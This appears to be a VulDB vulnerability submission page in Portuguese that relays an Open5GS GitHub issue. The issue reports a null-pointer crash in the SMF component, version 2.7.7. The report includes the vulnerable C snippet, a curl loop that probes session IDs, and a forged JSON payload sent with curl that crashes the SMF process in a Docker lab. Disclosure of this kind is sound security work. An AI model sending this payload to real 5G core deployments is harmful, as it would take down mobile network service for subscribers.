Submeter #808490: Open5gs SMF v2.7.7 Denial of Serviceinformação

Título	Open5gs SMF v2.7.7 Denial of Service
Descrição	### Open5GS Release, Revision, or Tag v2.7.7 ### Steps to reproduce ### Description SMF crashes when a `VsmfUpdateData` request to `POST /nsmf-pdusession/v1/vsmf-pdu-session/{smContextRef}/modify` contains a `qosFlowsAddModRequestList[*]` item with `qfi` and `qosFlowDescription` but no `qosFlowProfile`. `smf_nsmf_handle_update_data_in_vsmf()` accepts such an item through the first check and then immediately dereferences the missing `qosFlowProfile` while formatting the validation error log: ```c src = node->data; if (!src \|\| !src->qfi \|\| !(src->qos_flow_description \|\| src->qos_flow_profile)) { ... } qosFlowProfile = src->qos_flow_profile; if (!qosFlowProfile \|\| ...) { ogs_error("[%s:%d] Invalid qosFlowProfile [%d:%p:%d]", smf_ue->supi, sess->psi, qosFlowProfile->_5qi, qosFlowProfile->arp, qosFlowProfile->arp ? qosFlowProfile->arp->priority_level : 0); ``` That null dereference aborts the SMF process before it can return a normal error response. This issue is not a duplicate of the existing `sm-policy-notify` callback reports. It affects a different SBI route and a different HR-related business handler. As a control, supplying a valid `qosFlowProfile` caused execution to progress further into the same handler and later abort on a different assertion (`param.n2smbuf`), showing that the missing-profile case crashes earlier. ### Steps to reproduce 1. Start the Open5GS Docker lab and establish a real SMF session using the existing UERANSIM containers: ```bash docker restart smf-audit-ue docker logs --tail 30 smf-audit-ue ``` Wait until the UE log shows: ```text PDU Session establishment is successful PSI[1] ``` 2. Identify the active `smContextRef`. In this run it was `1`: ```bash for id in 1 2 3 4 5 6; do code=$(curl --http2-prior-knowledge -m 3 -s -o /tmp/out.$$ -w '%{http_code}' \ -X POST http://10.33.33.10/nsmf-callback/v1/sm-policy-notify/${id}/update \ -H 'content-type: application/json' \ --data '{"smPolicyDecision":{}}') printf '%s %s\n' "$id" "$code" done ``` 3. Send the forged update with `qosFlowProfile` omitted: ```bash payload=$(python3 - <<'PY' import json body = { "requestIndication": "NW_REQ_PDU_SES_MOD", "qosFlowsAddModRequestList": [ { "qfi": 1, "qosFlowDescription": "permit out ip from 10.0.0.1 1000 to any" } ] } print(json.dumps(body, separators=(",", ":"))) PY ) curl --http2-prior-knowledge -m 5 -sS -i \ -X POST http://10.33.33.10/nsmf-pdusession/v1/vsmf-pdu-session/1/modify \ -H 'content-type: application/json' \ --data "$payload" ``` 4. Check SMF state and logs: ```bash docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' smf docker logs --since 2026-04-10T21:01:35Z smf ``` ### Logs ```shell curl: (92) HTTP/2 stream 1 was not closed cleanly before end of the underlying stream exited 139 2026-04-10T21:01:42.284384125Z No application log was emitted for this malformed request before process exit. ``` ### Expected behaviour SMF should reject the malformed `VsmfUpdateData` item with a normal `400` error response. ### Observed Behaviour The HTTP/2 stream aborts and the SMF process exits with code `139`. ### eNodeB/gNodeB Not required. ### UE Models and versions Not required.
Fonte	⚠️ https://github.com/open5gs/open5gs/issues/4453
Utilizador	FrankLin (UID 97501)
Submissão	20/04/2026 21h23 (há 1 mês)
Moderação	11/05/2026 10h02 (21 days later)
Estado	Aceite
Entrada VulDB	362586 [Open5GS até 2.7.7 SMF /src/smf/nsmf-handler.c smf_nsmf_handle_update_data_in_vsmf qosFlowProfile Negação de Serviço]
Pontos	20

◂ Voltar Visão Geral Próximo ▸

Interested in the pricing of exploits?

See the underground prices here!